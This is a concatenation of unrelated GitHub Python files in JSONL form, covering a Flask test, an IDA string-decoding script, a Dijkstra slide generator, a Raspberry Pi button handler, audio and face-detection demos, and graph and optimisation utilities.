{"seq_id":"74620521056","text":"from example import app\nfrom json import loads\n\n\ndef test_google_cloud_function():\n    with app.test_client() as client:\n        desired_output = [{\"arg0\": \"a\", \"arg1\": \"b\"}]\n        resp = client.get(\"/aws/a/b\")\n        output = loads(resp.data)\n        assert output == desired_output\n","repo_name":"Glitchfix/flask-faas","sub_path":"test/unit/test_aws.py","file_name":"test_aws.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"43167708541","text":"#!/usr/bin/env python2.7\n# md5: 68CF2070D8FB4963211CFA4F2DAA72E5\n# filename: 
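`expand_y` in the feed-forward sample above builds the one-hot label matrix one row at a time. The usual vectorized numpy idiom indexes into an identity matrix instead; an equivalent sketch:

```python
import numpy as np

def expand_y_vectorized(y):
    # Labels 1..10 select rows of the 10x10 identity matrix,
    # producing the same (m, 10) one-hot matrix as the loop above.
    return np.eye(10)[y - 1]

y = np.array([1, 5, 10])
expected = np.zeros((3, 10))
expected[[0, 1, 2], [0, 4, 9]] = 1
assert np.array_equal(expand_y_vectorized(y), expected)
```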
68CF2070D8FB4963211CFA4F2DAA72E5\n# version: 1.0\n\nimport idc\nimport idautils\nimport idaapi\n#from print_hex import list_hex\n\ndef list_hex(int_list):\n \"\"\"print to hex form list, \n eg: [11, 23, 33] to [0xB, 0x17, 0x21]\"\"\"\n hex_list = []\n for x in xrange(len(int_list)):\n hex_str = hex(int_list[x])\n hex_list.append(hex_str)\n return '[%s]' % ', '.join(hex_list)\n\ndef get_data(curr):\n '''get crypted string'''\n data = []\n index = 0\n while True:\n var = idc.Byte(curr+index)\n if not var:\n break\n data.append(var)\n index += 1\n return (data, len(data))\n\ndef old_decode(data, size):\n '''decode data like base64'''\n sub_data = []\n for x in xrange(0, size, 4):\n for i in range(4):\n tmep = data[x+i]\n if temp == 0x3D: ## '='\n break\n sub_data[i] = data[x]\n## chr list ;0123456789abcdefghijklmnopqrstuvwxyzABCDEF(&#^*$!@%)[]{}<>?`:,.\nchr_list = [0x3B, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, \n 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B,\n 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76,\n 0x77, 0x78, 0x79, 0x7A, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x28, \n 0x26, 0x23, 0x5E, 0x2A, 0x24, 0x21, 0x40, 0x25, 0x29, 0x5B, 0x5D, \n 0x7B, 0x7D, 0x3C, 0x3E, 0x3F, 0x60, 0x3A, 0x2C, 0x2E]\n\ndef search_chr(charr):\n \"\"\"\" return arg offset in list.\"\"\"\n try:\n offset = chr_list.index(charr)\n except ValueError:\n print('[-] search_chr() error')\n offset = 0xFF\n return offset\n\ndef decode_four(byte_list, index=0):\n\n \"\"\"decode list four bytes\"\"\"\n '''\n .text:004016D7 mov ecx, [esp+70h+offset_four]\n .text:004016DB mov al, cl\n .text:004016DD add al, al\n .text:004016DF mov dl, ch\n .text:004016E1 shr dl, 4\n .text:004016E4 and dl, 3\n .text:004016E7 add al, al\n .text:004016E9 add dl, al\n .text:004016EB mov al, byte ptr [esp+70h+offset_four+2]\n .text:004016EF mov byte ptr [esp+70h+var_54], dl\n .text:004016F3 mov dl, al\n .text:004016F5 shr dl, 2\n .text:004016F8 mov cl, ch\n .text:004016FA shl al, 6\n .text:004016FD add al, byte ptr [esp+70h+offset_four+3]\n .text:00401701 and dl, 0Fh\n .text:00401704 shl cl, 4\n .text:00401707 xor dl, cl\n .text:00401709 mov byte ptr [esp+70h+var_54+1], dl\n .text:0040170D mov byte ptr [esp+70h+var_54+2], al\n '''\n al = byte_list[0]\n al = (al + al) & 0xFF\n dl = byte_list[1]\n dl = dl >> 4\n dl = dl & 3\n al = (al + al) & 0xFF\n dl = (al + dl) & 0xFF\n first_chr = chr(dl)\n dl = byte_list[2]\n dl = dl >> 2\n dl = dl & 0x0F\n cl = byte_list[1]\n cl = (cl << 4) & 0xFF\n dl = dl ^ cl\n second_chr = chr(dl)\n al = byte_list[2]\n al = (al << 6) & 0xFF\n al = (al + byte_list[3]) & 0xFF\n three_chr = chr(al)\n print('[+] encode chr: %c, %c, %c' % (first_chr, second_chr, three_chr))\n if index:\n return (first_chr, second_chr, three_chr)\n return ''.join([first_chr, second_chr, three_chr])\n\n\ndef decode(data, size):\n \"\"\"decode data like base64\"\"\"\n sub_data = [0, 0, 0, 0]\n offset = [0, 0, 0, 0]\n index = 0\n decode_str = ''\n for x in xrange(size):\n if data[x] == 0x3D: ## '='\n break\n index += 1\n sub_index = x % 4\n sub_data[sub_index] = data[x]\n if index == 4:\n print('[+] sub_data %s' % list_hex(sub_data))\n for i in range(4):\n offset[i] = search_chr(sub_data[i])\n ## call decode this four byte\n print('[+] offset_list %s' % list_hex(offset))\n decode_str += decode_four(offset)\n\n index = 0\n if index:\n # surplus = 4 - index\n print(\"[+] exist '=' %s\" % list_hex(data[-4:]))\n for i in range(4):\n offset[i] = search_chr(data[i-4])\n print('[+] end four chr 
offset %s' % list_hex(offset))\n end_four = decode_four(offset, index)\n for x in range(index-1):\n decode_str += end_four[x]\n\n return decode_str\n\n# \"\"\"\n# Segmented from the main,other modules can be used.\ndef done(addr):\n print('[+] address: %#x' % addr)\n crypted_data, crypted_size = get_data(addr)\n if crypted_size > 0:\n decode_data = decode(crypted_data, crypted_size)\n idc.MakeRptCmt(addr, str(decode_data))\n return decode_data\n #print('[+] size: %#x' % crypted_size)\n else:\n print('[-] failed')\n return None\n\ndef main():\n print('[+] start')\n currer = idc.ScreenEA()\n done(currer)\n\n#######################################################################\n## hotkey\nhotkey_ctx = idaapi.add_hotkey('z', main)\nif hotkey_ctx is None:\n print('[-] Failed to register hotkey!')\n del hotkey_ctx\nelse:\n print('[+] Hotkey registered!')\n## \"\"\"\n\n\"\"\"\n## test unit\nif __name__ == '__main__':\n test = [0x66, 0x7B, 0x38, 0x41, 0x6E, 0x6D, 0x67, 0x41, 0x66, 0x5D, \n 0x3A, 0x23, 0x72, 0x35, 0x34, 0x29, 0x70, 0x6C, 0x38, 0x26, \n 0x6F, 0x6A, 0x38, 0x45, 0x73, 0x35, 0x5B, 0x77, 0x72, 0x3B,\n 0x3D, 0x3D]\n test2 = [0x69, 0x35, 0x3A, 0x77, 0x6F, 0x33, 0x63, 0x5B, 0x72, 0x43, \n 0x63, 0x2A, 0x72, 0x41, 0x72, 0x3D]\n decode_data = decode(test2, len(test2))\n print('[+] test unit decode_data: %s' % decode_data)\n\"\"\"","repo_name":"kcufId/my_ida_python","sub_path":"68CF2070D8FB4963211CFA4F2DAA72E5/decode_string.py","file_name":"decode_string.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6722001403","text":"import math\n\ndef _format_number(x):\n if x == float('inf'):\n return '$\\infty$'\n else:\n return x\n\nclass Node():\n def __init__(self, label):\n self.label = label\n self.visited = False\n self.visiting = False\n self.updating = False\n self.distance = float('inf')\n self.previous = None\n self.distance_changed = False\n self.path = None\n self.edges = []\n\n def table_line(self):\n visited_style = \"visited\" if self.visited else \"unvisited\"\n if self.updating:\n visited_style = \"updating\"\n elif self.distance_changed:\n visited_style = \"changed\"\n return (\n (r\"|[my label {visited}]| {label} \\& |[my distance {visited}]| {distance}\" + \n r\"\\& |[my previous {visited}]| {previous} \"\n r\"\\& |[my path {visited}]| {path}\").format(\n visited=visited_style,\n label=self.label,\n distance=_format_number(self.distance),\n changed=\"changed\" if self.distance_changed else \"unchanged\",\n previous=\"---\" if self.previous == None else self.previous,\n path=r'$\\rightarrow$'.join(self.path) if self.path != None else '---',\n )\n )\n\n def graph_rules(self):\n if self.updating:\n return (\n r\"graph at {}/.style={{hilite}},edges from {}/.style={{hilite}},\".format(self.label, self.label)\n )\n elif self.visited:\n return (\n r\"graph at {}/.style={{hidden}},\".format(self.label)\n )\n else:\n return \"\"\n\n def graph_rules_init(self):\n return (\n r\"graph at {}/.style={{}},edges from {}/.style={{}},\".format(self.label, self.label)\n )\n\n def graph_line(self, edge_type='->'):\n output = \"\"\n for out_vertex, out_weight in self.edges:\n if edge_type == '--' and out_vertex < self.label:\n continue\n output += '{label}[graph at {label}] {edge_type}[edges from {label},edges from {out_label},\"{out_weight}\"] {out_vertex}[graph at {out_vertex}],\\n'.format(\n label=self.label,\n out_label=out_vertex if edge_type == '--' else self.label,\n 
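The hard-coded `chr_list` table in `decode_string.py` above is exactly the ordinal values of the 64-character alphabet named in its comment, i.e. a 6-bit, base64-like symbol set. Deriving the table from the alphabet string makes that explicit:

```python
# chr_list above is derivable from the alphabet named in its comment; the
# length of 64 is what makes the 6-bits-per-symbol decode_four() packing work.
CHARSET = ";0123456789abcdefghijklmnopqrstuvwxyzABCDEF(&#^*$!@%)[]{}<>?`:,."
derived = [ord(c) for c in CHARSET]
assert len(derived) == 64
assert derived[0] == 0x3B  # ';'
# Pasted into decode_string.py, `derived == chr_list` holds, and
# search_chr(b) is then just CHARSET.index(chr(b)) over this table.
```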
out_vertex=out_vertex,\n out_weight=out_weight,\n edge_type=edge_type,\n )\n return output\n\n\nclass Graph():\n nodes = {}\n\n def add_node(self, k, v):\n self.nodes[k] = Node(k)\n self.nodes[k].edges = v\n\n def reflect_edges(self):\n for k in self.nodes.keys():\n for e in self.nodes[k].edges:\n target = e[0]\n new_edge = (k, e[1])\n if new_edge not in self.nodes[target].edges:\n self.nodes[target].edges.append(new_edge)\n\n\n def generate_table(self):\n output = []\n for key in sorted(self.nodes.keys()):\n output.append(self.nodes[key].table_line())\n return (r'\\\\' + '\\n').join(output) + r'\\\\'\n\n def generate_graph_rules(self):\n output = []\n for key in sorted(self.nodes.keys()):\n output.append(self.nodes[key].graph_rules())\n return ''.join(output)\n\n def best_first_search(self, start, edge_type='->'):\n tables = []\n rules = []\n self.nodes[start].distance = 0\n self.nodes[start].path = [start]\n def _find_next():\n best_distance = float('inf')\n best_node = None\n for node_key in sorted(self.nodes.keys()):\n node = self.nodes[node_key]\n if node.visited:\n continue\n if node.distance < best_distance:\n best_node = node\n best_distance = node.distance\n return best_node\n tables.append(self.generate_table())\n rules.append(self.generate_graph_rules())\n while True:\n current = _find_next()\n if current == None:\n break\n current.updating = True\n for out_key, weight in current.edges:\n out = self.nodes[out_key]\n new_distance = current.distance + weight\n if new_distance < out.distance:\n out.distance = new_distance\n out.previous = current.label\n out.path = current.path + [out.label]\n out.distance_changed = True\n tables.append(self.generate_table())\n rules.append(self.generate_graph_rules())\n for node in self.nodes.values():\n node.distance_changed = False\n current.updating = False\n current.visited = True\n graph_rules_init = list(map(lambda k: self.nodes[k].graph_rules_init(), sorted(self.nodes.keys())))\n output = r'''\n\\tikzset{%s}\n''' % ('\\n'.join(graph_rules_init))\n for i, rule in enumerate(rules):\n output += (r'''\n\\tikzset{\n alt=<%s>{%s}{},\n}\n''' % (i + 1 , rule))\n graph_lines = list(map(lambda k: self.nodes[k].graph_line(edge_type), sorted(self.nodes.keys())))\n output += r'''\n\\matrix[my graph box] (the graph) {\n\\begin{scope}[my graph]\n\\graph[spring layout]{\n %s\n};\n\\end{scope}\n\\\\\n};\n''' % ('\\n'.join(graph_lines))\n for i, table in enumerate(tables):\n output += (r'''\n\\begin{onlyenv}<%s>\n\\matrix[\n my algorithm table,\n ] (the table) {\n~ \\& dist \\& prev \\& path \\\\\n%s\n};\n\\end{onlyenv}\n ''' % (i + 1, table))\n return output\n\ndef example_one():\n g = Graph()\n g.add_node('A', [('C', 2), ('D', 1)])\n g.add_node('B', [('A', 2)])\n g.add_node('C', [('D', 1), ('F', 2)])\n g.add_node('D', [('B', 5), ('E', 1), ('F', 6), ('G', 5)])\n g.add_node('E', [('B', 1)])\n g.add_node('F', [('G', 10)])\n g.add_node('G', [('E', 3)])\n print(g.best_first_search('A'))\n\ndef example_two():\n g = Graph()\n g.add_node('A', [('B', 7), ('C', 9), ('G', 14)])\n g.add_node('B', [('C', 10), ('D', 15)])\n g.add_node('C', [('D', 11), ('G', 2)])\n g.add_node('D', [('E', 6)])\n g.add_node('E', [('G', 9)])\n g.add_node('G', [])\n g.reflect_edges()\n print(g.best_first_search('A', '--'))\n\nif __name__ == '__main__':\n 
example_one()\n","repo_name":"charlesreiss/cs2150-slides","sub_path":"graphs/make_bfs_example.py","file_name":"make_bfs_example.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"34902331154","text":"import RPi.GPIO as GPIO # import GPIO pin communication\nimport time # lets us turn the LED off after some amount of time\nimport printing # import the print.py file, normally located in the same folder\nimport led\n\n# Tell the Raspberry Pi that we address pins by their GPIOXX numbers\n# diagram: https://cdn-learn.adafruit.com/assets/assets/000/031/833/original/raspberry_pi_gpio-diagram.png?1461025067\nGPIO.setmode(GPIO.BCM) \n# (it is also possible to address pins directly by their board numbers with)\n#GPIO.setmode(GPIO.BOARD)\n\n# Initialize pin GPIO23 (button) as IN and pin GPIO16 (LED) as OUT.\nGPIO.setup(23, GPIO.IN, pull_up_down=GPIO.PUD_UP) # GPIO.IN -> listen on the pin (INPUT) | pull_up_down=GPIO.PUD_UP -> the Raspberry Pi handles the pull-up here, to avoid reading an input that floats between 0 and 1\nGPIO.setup(16, GPIO.OUT) # GPIO.OUT -> drive the pin (OUTPUT), which will light the LED\n\n\ntry: # Try to run this code...\n\n\twhile True:\n\t\tbutton_state = GPIO.input(23) # read pin 23's state into a variable (either 1 or 0)\n\t\tif button_state == False: \n\t\t\tprint(\"the button was pressed\")\n\t\t\tled.pushedButtonDetected()\n\t\t\tprinting.printFile() # call the function in print.py that starts the print job\n\n\t\telse:\n\t\t\tGPIO.output(16, False) # keep the LED off\n\t\t\t\t\nexcept: # ... and if an error occurs \n\tGPIO.cleanup() # clean up the used ports \n\t\n","repo_name":"estherbouquet/lectura-plus","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"fr","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"}
{"seq_id":"73169567138","text":"import math\nimport time\n\nfrom scipy import signal\nfrom scipy.io import wavfile\nimport cv2\n\nt1 = time.time()\n\naddr = input('Input file\'s address:')\n\nsample_rate, samples = wavfile.read(addr)\nfrequencies, times, spectrogram = signal.spectrogram(samples, sample_rate)\n\nhFrequencies = []\nmaxAmp = 0\nminAmp = 1000000\nmaxFreq = 0\nminFreq = 1000000\nfor i in range(0, times.size):\n    maxAmpT = 0\n    mft = 0\n    for j in range(0, frequencies.size):\n        mft += spectrogram[j, i] * frequencies[j]\n        if spectrogram[j, i] > maxAmpT:\n            maxAmpT = spectrogram[j, i]\n    maxAmp = max(maxAmpT, maxAmp)\n    minAmp = min(maxAmpT, minAmp)\n    maxFreq = max(mft, maxFreq)\n    minFreq = min(mft, minFreq)\n    hFrequencies.append((mft, maxAmpT))\n\nimgLU = cv2.imread(\"../blank.jpg\", cv2.IMREAD_COLOR)\nimgRU = cv2.imread(\"../blank.jpg\", cv2.IMREAD_COLOR)\nimgLD = cv2.imread(\"../blank.jpg\", cv2.IMREAD_COLOR)\nimgRD = cv2.imread(\"../blank.jpg\", cv2.IMREAD_COLOR)\nheight, width, channels = imgLU.shape\n\nfor 
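`best_first_search` in the graph sample above re-scans every node in `_find_next` on each step, which is O(V^2) overall; that is fine for slide-sized graphs, but the standard improvement is a binary heap. A standalone sketch over a plain adjacency dict rather than the `Node`/`Graph` classes used above:

```python
import heapq

def dijkstra(adj, start):
    # adj maps node -> [(neighbor, weight), ...]; returns shortest distances.
    dist = {start: 0}
    heap = [(0, start)]
    while heap:
        d, u = heapq.heappop(heap)
        if d > dist.get(u, float('inf')):
            continue  # stale heap entry; u was already settled via a shorter path
        for v, w in adj.get(u, []):
            nd = d + w
            if nd < dist.get(v, float('inf')):
                dist[v] = nd
                heapq.heappush(heap, (nd, v))
    return dist

adj = {'A': [('C', 2), ('D', 1)], 'C': [('D', 1)], 'D': [('C', 5)]}
print(dijkstra(adj, 'A'))  # {'A': 0, 'C': 2, 'D': 1}
```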
(t, (f, a)) in enumerate(hFrequencies):\n hsv = (\n 180 - math.floor((((f - minFreq) / (maxFreq - minFreq)) * 180)), (math.floor(((a - minAmp) / (maxAmp - minAmp)) * 100.0) + 155), 255)\n cv2.circle(imgLD, (0, -height), math.floor(t), hsv, 2)\n\nfor (t, (f, a)) in enumerate(hFrequencies):\n hsv = (\n 180 - math.floor((((f - minFreq) / (maxFreq - minFreq)) * 180)), (math.floor(((a - minAmp) / (maxAmp - minAmp)) * 100.0) + 155), 255)\n cv2.circle(imgRD, (-width, -height), math.floor(t), hsv, 2)\n\nimgLU = cv2.cvtColor(imgLU, cv2.COLOR_HSV2RGB)\nimgLD = cv2.cvtColor(imgLD, cv2.COLOR_HSV2RGB)\nimgRU = cv2.cvtColor(imgRU, cv2.COLOR_HSV2RGB)\nimgRD = cv2.cvtColor(imgRD, cv2.COLOR_HSV2RGB)\n\ncv2.namedWindow('LU', cv2.WINDOW_NORMAL)\ncv2.imshow('LU', imgLU)\n\ncv2.namedWindow('LD', cv2.WINDOW_NORMAL)\ncv2.imshow('LD', imgLD)\n\ncv2.namedWindow('RU', cv2.WINDOW_NORMAL)\ncv2.imshow('RU', imgRU)\n\ncv2.namedWindow('RD', cv2.WINDOW_NORMAL)\ncv2.imshow('RD', imgRD)\n\nprint(time.time() - t1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"hpez/tunegraphy","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"39338541960","text":"import cv2\nimport mediapipe as mp\nimport time\n\ncap = cv2.VideoCapture(0)\ncv2.namedWindow('get_video', cv2.WINDOW_NORMAL)\ncv2.resizeWindow('get_video', 640, 480)\npTime = 0\n\nmpFaceDetection = mp.solutions.face_detection\nmpDraw = mp.solutions.drawing_utils\nfaceDetection = mpFaceDetection.FaceDetection()\n\nwhile True:\n success, frame = cap.read()\n frameRGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n results = faceDetection.process(frameRGB)\n if results.detections:\n for id, detection in enumerate(results.detections):\n # mpDraw.draw_detection(frame, detection)\n bboxC = detection.location_data.relative_bounding_box\n h, w, c = frame.shape\n bbox = [int(bboxC.xmin * w), int(bboxC.ymin * h), int(bboxC.width * w), int(bboxC.height * h)]\n cv2.rectangle(frame, bbox, (255, 0, 255), 2)\n cv2.putText(frame, str(round(detection.score[0], 2)), (bbox[0], bbox[1] - 10), cv2.FONT_HERSHEY_PLAIN,\n 1, (255, 0, 255), 2)\n # print(id, detection)\n # print(detection.score)\n # print(detection.location_data.relative_bounding_box)\n\n cTime = time.time()\n fps = 1 / (cTime - pTime)\n pTime = cTime\n\n cv2.putText(frame, str(int(fps)), (20, 70), cv2.FONT_HERSHEY_PLAIN, 3, (0, 255, 0), 2)\n cv2.imshow('get_video', frame)\n if cv2.waitKey(30) == ord('q'):\n break\n\ncv2.destroyAllWindows()\n","repo_name":"Mingrui-Huang/OpenCV","sub_path":"学习/opencv项目/人脸检测/作业5@1_人脸识别.py","file_name":"作业5@1_人脸识别.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6582258632","text":"import argparse\nimport numpy as np\n\ndef my_parser( ):\n # Argument Parsers\n parser = argparse.ArgumentParser( description = 'Parsing the arguments for running the simulation' )\n parser.add_argument( '--version' , action = 'version' , version = Constants.VERSION )\n\n parser.add_argument( '--start_time' , action = 'store' , type = float , default = 0.0, help = 'Start time of the controller' )\n parser.add_argument( '--run_time' , action = 'store' , type = float , default = 4.0, help = 'Total run time of the simulation' )\n parser.add_argument( '--model_name' , action = 'store' , type = str , default = '2D_model' , help = 'Model name for the simulation' )\n 
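The nested loop in the tunegraphy sample above accumulates `spectrogram[j, i] * frequencies[j]` per time frame, i.e. an amplitude-weighted frequency sum (an unnormalized spectral centroid). With `scipy.signal.spectrogram` output of shape `(n_freq, n_times)`, numpy computes all frames at once; a sketch (`spectral_centroid` is an illustrative name):

```python
import numpy as np

def spectral_centroid(frequencies, spectrogram):
    # frequencies: (n_freq,), spectrogram: (n_freq, n_times).
    # Row vector @ matrix yields the weighted sum per time frame in one shot;
    # dividing by total amplitude gives the conventional spectral centroid.
    total = spectrogram.sum(axis=0)
    weighted = frequencies @ spectrogram
    return np.divide(weighted, total,
                     out=np.zeros_like(weighted), where=total > 0)
```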
parser.add_argument( '--ctrl_name' , action = 'store' , type = str , default = 'joint_imp_ctrl', help = 'Model name for the simulation' )\n parser.add_argument( '--cam_pos' , action = 'store' , type = str , help = 'Get the whole list of the camera position' )\n parser.add_argument( '--mov_pars' , action = 'store' , type = str , help = 'Get the whole list of the movement parameters' )\n parser.add_argument( '--target_type' , action = 'store' , type = int , help = 'Save data log of the simulation, with the specified frequency' )\n parser.add_argument( '--print_mode' , action = 'store' , type = str , default = 'normal', help = 'Print mode, choose between [short] [normal] [verbose]' )\n\n parser.add_argument( '--target_idx' , action = 'store' , type = int , default = 1, help = 'Index of Target 1~6' )\n\n parser.add_argument( '--print_freq' , action = 'store' , type = int , default = 60 , help = 'Specifying the frequency of printing the data.' )\n parser.add_argument( '--save_freq' , action = 'store' , type = int , default = 60 , help = 'Specifying the frequency of saving the data.' )\n parser.add_argument( '--vid_speed' , action = 'store' , type = float , default = 1. , help = 'The speed of the video. It is the gain of the original speed of the video ' )\n\n parser.add_argument( '--record_vid' , action = 'store_true' , dest = \"is_record_vid\" , help = 'Record video of the simulation, with the specified speed' )\n parser.add_argument( '--save_data' , action = 'store_true' , dest = \"is_save_data\" , help = 'Save the details of the simulation' )\n parser.add_argument( '--vid_off' , action = 'store_true' , dest = \"is_vid_off\" , help = 'Turn off the video' )\n parser.add_argument( '--run_opt' , action = 'store_true' , dest = \"is_run_opt\" , help = 'Run optimization of the simulation' )\n\n parser.add_argument( '--opt_type' , action = 'store' , type = int, dest = \"opt_type\" , help = 'Type of Optimization' )\n\n return parser\n\n\nclass Constants:\n PROJECT_NAME = '[M3X] Whip Project'\n VERSION = '2.0.0'\n UPDATE_DATE = '2022.06.21'\n AUTHOR_GITHUB = 'mosesnah-shared'\n AUTHOR_FULL_NAME = 'Moses C. Nah'\n DESCRIPTION = \"mujoco-py scripts for running a whip-targeting simuation\"\n URL = 'https://github.com/mosesnah-shared/whip-project-targeting',\n AUTHOR_EMAIL = 'mosesnah@mit.edu', 'mosesnah@naver.com'\n\n # =============================================================== #\n # Constant variables for running the simulation\n # =============================================================== #\n \n # The module directory which contains all python modules.\n MODULE_DIR = \"./modules/\"\n\n # The model directory which contains all the xml model files.\n MODEL_DIR = \"./models/\"\n\n # The directory which saves all the simulation results\n SAVE_DIR = \"./results/\"\n\n # The directory which saves all the temporary data\n TMP_DIR = \"./tmp/\"\n\n # The constant K matrices that we will use often. \n # For a 2DOF model\n # [REF] Nah, Moses C., et al. 
\"Dynamic primitives facilitate manipulating a whip.\", BIOROB 2020\n K_2DOF = np.array( [ [ 29.50, 14.30 ], [ 14.30, 39.30 ] ] )\n \n # For a 4DOF model.\n # [REF] Manipulating a whip in 3D\n K_4DOF = np.array( [ [ 17.40, 6.85, -7.75, 8.40 ] ,\n [ 6.85, 33.0, 3.70, 0.00 ] ,\n [ -7.75, 3.70, 27.7, 0.00 ] ,\n [ 8.40, 0.00, 0.00, 23.2 ] ] )\n\n K_dict = { 2: K_2DOF, 4: K_4DOF }\n # K_4DOF = 300 * np.eye( 4 )\n\n # The above value is the symmetric part of the following matrix\n # K_4DOF = np.array( [ [ 17.40, 4.70, -1.90, 8.40 ] ,\n # [ 9.00, 33.0, 4.40, 0.00 ] ,\n # [ -13.6, 3.00, 27.7, 0.00 ] ,\n # [ 8.40, 0.00, 0.00, 23.2 ] ] )\n","repo_name":"mosesnah-shared/whip-project-targeting","sub_path":"modules/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"5024420453","text":"#!/usr/bin/env python\n\"\"\"\n** CSC 532 Final Research Project **\nComparing Sequential and Parallel Algorithm Performance for Solving the Maximum Clique Problem\nBy: Aaron Csetter, Dmytro Dobryin, Ian Pena, and Nathan Davis\nUNCW: Spring 2023\n\"\"\"\nimport time\nimport networkx as nx\nimport csv\nfrom os.path import exists\n\n\ndef timing(f):\n \"\"\"\n Wraps a function in a timer and returns the function's return value and the time it\n took to execute the function in seconds. Source: https://github.com/donfaq/max_clique\n :param f: a function annotated with `@timing`\n :return: (func, float) return value of f, execution time of f\n \"\"\"\n def wrap(*args):\n t1 = time.perf_counter()\n fn = f(*args)\n t2 = time.perf_counter()\n return fn, t2 - t1\n return wrap\n\n\ndef read_dimacs_graph(file_path: str, name=\"\", verbose=False) -> nx.Graph:\n \"\"\"\n Parse .col file and return graph object\n :param name: (Str) the name of the graph.\n :param verbose: (bool) whether to print .col file info or not.\n :param file_path: (Str) path to the .col\n :return: (nx.graph) the graph built from expected file path.\n \"\"\"\n if name == \"\":\n start = max(file_path.rfind('/'), file_path.rfind('\\\\')) + 1\n name = file_path[start:file_path.rfind('.')]\n edges = []\n ext = file_path.endswith('mtx')\n with open(file_path, 'r') as file:\n if file_path.endswith('mtx'):\n lines = file.readlines()[2:]\n for line in lines:\n v1, v2 = line.split()\n edges.append((v1, v2))\n elif file_path.endswith('col'):\n for line in file:\n if verbose and line.startswith(('c', 'p')):\n print(line[2:].strip())\n\n if line.startswith('e'):\n _, v1, v2 = line.split()\n edges.append((v1, v2))\n else:\n raise ValueError(\"Filetype not supported.\")\n\n return nx.Graph(edges, name=name)\n\n\ndef graph_max_degree(g: nx.Graph):\n return sorted(nx.degree(g), key=lambda x: x[1])[-1][1]\n\n\ndef fetch_graph_info(g: nx.Graph, printable=False) -> dict:\n nodes = sorted(nx.degree(g), key=lambda x: x[1])\n w_space = ' ' if printable else ''\n return {\n \"Graph Name\": g.name,\n \"# Vertices\": g.number_of_nodes(),\n f\"# Edges{w_space}\": g.number_of_edges(),\n f\"Density{w_space}\": nx.density(g),\n \"Avg Degree\": sum([x[1] for x in nodes]) / len(nodes),\n \"Max Degree\": nodes[-1][1],\n \"Min Degree\": nodes[0][1],\n \"# Isolated\": [x[1] for x in nodes].count(0)\n }\n\n\ndef print_graph_info(g: nx.Graph):\n # nodes = sorted(nx.degree(g), key=lambda x: x[1])\n g_info = fetch_graph_info(g, printable=True)\n p_str = \"\"\n\n for key in g_info.keys():\n p_str += f\"{key}\\t{g_info[key]}\\n\"\n\n print(p_str)\n\n\ndef 
print_test_results(results: dict):\n s = \"\"\n for key in results.keys():\n s += f\"{key}\\t{results[key]}\\n\"\n\n print(s)\n\n\ndef log_results(results: dict, file_path=\"results.csv\"):\n mode = \"a+\"\n if not exists(f\"./{file_path}\"):\n mode = \"w+\"\n with open(file_path, mode, newline='') as f:\n writer = csv.writer(f)\n if mode == \"w+\":\n writer.writerow(results.keys())\n writer.writerow(results.values())\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"acsetter/mcp-project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9470726789","text":"import numpy as np\nimport matplotlib.pylab as plt\nimport os\nimport pickle\nimport pca\n# from optimization import kernel_optim\nfrom lib import load\nfrom lib import training\nimport time\nimport subprocess\n\ntimbrespace_db = load.database()\nrepresentations = [\n # 'auditory_spectrum',\n # 'fourier_spectrum',\n # 'auditory_strf',\n # 'fourier_strf',\n # 'auditory_spectrogram', \n 'fourier_spectrogram',\n # 'auditory_mps', \n # 'fourier_mps',\n]\n\n\ndef run_once(tsp, rs, optim_args):\n rslog_foldername = optim_args['log_foldername']\n rs = rslog_foldername.split('/')[-1].split('-')[0]\n dissimil_mat = load.timbrespace_dismatrix(tsp, timbrespace_db)\n aud_repres = load.timbrespace_features(\n tsp,\n representations=[rs],\n window=None,\n timbrespace_db=None,\n verbose=True)[rs]\n tab_red = []\n rs_type = rs.split('_')[-1]\n mapping = []\n variances = []\n if rs_type == 'strf':\n n_components = 1\n for i in range(len(aud_repres)):\n strf_reduced, mapping, variances = pca.pca(\n np.absolute(aud_repres[i]),\n aud_repres[i].shape[1],\n n_components=n_components)\n strf_reduced = strf_reduced.flatten()\n tab_red.append(strf_reduced)\n # tab_red.append(strf_reduced / np.max(strf_reduced))\n tab_red = np.transpose(np.asarray(tab_red))\n elif rs_type == 'spectrogram' or rs_type == 'mps':\n for i in range(len(aud_repres)):\n tab_red.append(aud_repres[i].flatten())\n tab_red = np.transpose(np.asarray(tab_red))\n elif rs_type == 'spectrum':\n for i in range(len(aud_repres)):\n tab_red.append(aud_repres[i])\n # 128 x nb sounds (time or freq?)\n tab_red = np.transpose(np.asarray(tab_red))\n pickle.dump({\n 'data_repres': aud_repres,\n 'data_proj': tab_red,\n 'mapping': mapping,\n 'variances': variances,\n 'dissimilarities': dissimil_mat,\n }, open(os.path.join(rslog_foldername, 'dataset.pkl'), 'wb'))\n print(' data dimension:', tab_red.shape)\n print('* normalizing')\n tab_red = tab_red / np.max(np.max(np.abs(tab_red), axis=0))\n # plt.plot(tab_red)\n # plt.show()\n # optimization\n correlations = 